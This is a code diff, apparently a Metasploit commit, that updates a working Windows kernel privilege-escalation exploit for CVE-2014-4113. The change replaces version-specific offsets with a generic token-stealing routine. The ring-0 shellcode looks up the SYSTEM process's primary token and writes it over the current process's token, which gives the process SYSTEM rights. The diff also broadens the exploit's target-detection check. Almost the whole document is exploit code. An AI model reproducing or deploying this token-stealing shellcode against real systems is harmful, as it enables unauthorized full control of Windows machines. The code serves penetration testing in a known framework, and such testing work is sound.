Land rapid7#4108 - Avoid local offsets in CVE-2014-4113

Author: OJ

data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll

@@ -38,6 +38,10 @@ typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
 	OUT  PVOID Process
 );
 
+typedef PACCESS_TOKEN(NTAPI *lPsReferencePrimaryToken)(
+	_Inout_  PVOID Process
+);
+
 typedef NTSTATUS(NTAPI *lZwQuerySystemInformation)(
 	_In_       DWORD SystemInformationClass,
 	_Inout_    PVOID SystemInformation,
@@ -70,9 +74,9 @@ BOOL bHookCallbackFlag = FALSE;
 
 WNDPROC lpPrevWndFunc;
 DWORD dwMyProcessId = 0;
-DWORD dwOffsetWindows = 0;
 
 lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
+lPsReferencePrimaryToken pPsReferencePrimaryToken = NULL;
 lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;
 
 #ifdef DEBUGGING
@@ -131,16 +135,55 @@ DWORD_PTR __stdcall get_threadinfo_ptr(void)
 #endif
 }
 
-int _stdcall shellcode_ring0(int one, int two, int three, int four)
+
+// Search the specified data structure for a member with CurrentValue.
+BOOL find_and_replace_member(PDWORD pdwStructure, DWORD dwCurrentValue, DWORD dwNewValue, DWORD dwMaxSize)
 {
-	void *my_process_info = NULL;
-	void *system_info = NULL;
+	DWORD dwIndex, dwMask;
+
+	// Microsoft QWORD aligns object pointers, then uses the lower three
+	// bits for quick reference counting.
+#ifdef _M_X64
+	dwMask = ~0xf;
+#else
+	dwMask = ~7;
+#endif
+	// dwMask out the reference count.
+	dwCurrentValue &= dwMask;
 
-	pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &my_process_info);
-	pPsLookupProcessByProcessId((HANDLE)4, &system_info);
+	// Scan the structure for any occurrence of dwCurrentValue.
+	for (dwIndex = 0; dwIndex < dwMaxSize; dwIndex++)
+	{
+		if ((pdwStructure[dwIndex] & dwMask) == dwCurrentValue)
+		{
+			// And finally, replace it with NewValue.
+			pdwStructure[dwIndex] = dwNewValue;
+			return TRUE;
+		}
+	}
 
-	*(PDWORD)((PBYTE)my_process_info + dwOffsetWindows) = *(PDWORD)((PBYTE)system_info + dwOffsetWindows);
+	// Member not found.
+	return FALSE;
+}
 
+int _stdcall shellcode_ring0(int one, int two, int three, int four)
+{
+	void *pMyProcessInfo = NULL;
+	void *pSystemInfo = NULL;
+	PACCESS_TOKEN systemToken;
+	PACCESS_TOKEN targetToken;
+
+	pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &pMyProcessInfo);
+	pPsLookupProcessByProcessId((HANDLE)4, &pSystemInfo);
+
+	targetToken = pPsReferencePrimaryToken(pMyProcessInfo);
+	systemToken = pPsReferencePrimaryToken(pSystemInfo);
+
+	// Find the token in the target process, and replace with the system token.
+	find_and_replace_member((PDWORD)pMyProcessInfo,
+		(DWORD)targetToken,
+		(DWORD)systemToken,
+		0x200);
 	return 0;
 }
 
@@ -169,61 +212,6 @@ void win32k_null_page(LPVOID lpPayload)
 		return;
 	}
 
-#ifdef _M_X64
-	if (versionInfo.dwMajorVersion == 6 && versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
-	{
-		// Ex: Windows 7 SP1
-		dprintf("[*] Windows 6.1 found...");
-		dwOffsetWindows = 0x208;
-	}
-#else
-	if (versionInfo.dwMajorVersion == 6)
-	{
-		if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
-		{
-			// Ex: Windows 7 SP1
-			dprintf("[*] Windows 6.1 found...");
-			dwOffsetWindows = 0xf8;
-		}
-		else if (!versionInfo.dwMinorVersion)
-		{
-			// Ex: Windows 2008 R2
-			dprintf("[*] Windows 6.0 found...");
-			dwOffsetWindows = 0xe0;
-		}
-		else
-		{
-			dprintf("[!] Unsupported Windows 6.%d found, only 6.0 and 6.1 supported atm", versionInfo.dwMinorVersion);
-			return;
-		}
-	}
-	else if (versionInfo.dwMajorVersion == 5)
-	{
-		if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
-		{
-			// Ex: Windows XP SP3
-			dprintf("[*] Windows 5.1 found...");
-			dwOffsetWindows = 0xc8;
-		}
-		else if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 2)
-		{
-			// Ex: Windows 2003 SP2
-			dprintf("[*] Windows 5.2 found...");
-			dwOffsetWindows = 0xd8;
-		}
-		else
-		{
-			dprintf("[!] Unsupported Windows 5  found, only 5.1 and 5.2 supported atm");
-			return;
-		}
-	}
-#endif
-	else
-	{
-		dprintf("[!] Major Version %d found, not supported", versionInfo.dwMajorVersion);
-		return;
-	}
-
 	// Solve symbols
 	dprintf("[*] Solving symbols...");
 
@@ -321,6 +309,18 @@ void win32k_null_page(LPVOID lpPayload)
 	pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD_PTR)pNtBase + ((DWORD_PTR)pPsLookupProcessByProcessId - (DWORD_PTR)hNtKrnl));
 	dprintf("[*] pPsLookupProcessByProcessId in kernel: 0x%p", pPsLookupProcessByProcessId);
 
+
+	pPsReferencePrimaryToken = (lPsReferencePrimaryToken)GetProcAddress(hNtKrnl, "PsReferencePrimaryToken");
+
+	if (pPsReferencePrimaryToken == NULL)
+	{
+		dprintf("[!] Failed to solve PsLookupProcessByProcessId");
+		return;
+	}
+
+	pPsReferencePrimaryToken = (lPsReferencePrimaryToken)((DWORD_PTR)pNtBase + ((DWORD_PTR)pPsReferencePrimaryToken - (DWORD_PTR)hNtKrnl));
+	dprintf("[*] pPsReferencePrimaryToken in kernel: 0x%p", pPsReferencePrimaryToken);
+
 	dwMyProcessId = GetCurrentProcessId();
 
 	// Register Class

data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll

@@ -94,11 +94,7 @@ def check
     return Exploit::CheckCode::Safe if build == 9200
     return Exploit::CheckCode::Safe if build == 9600
 
-    if arch == ARCH_X86
-      return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
-    else
-      return Exploit::CheckCode::Detected if build == 7601
-    end
+    return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
 
     return Exploit::CheckCode::Unknown
   end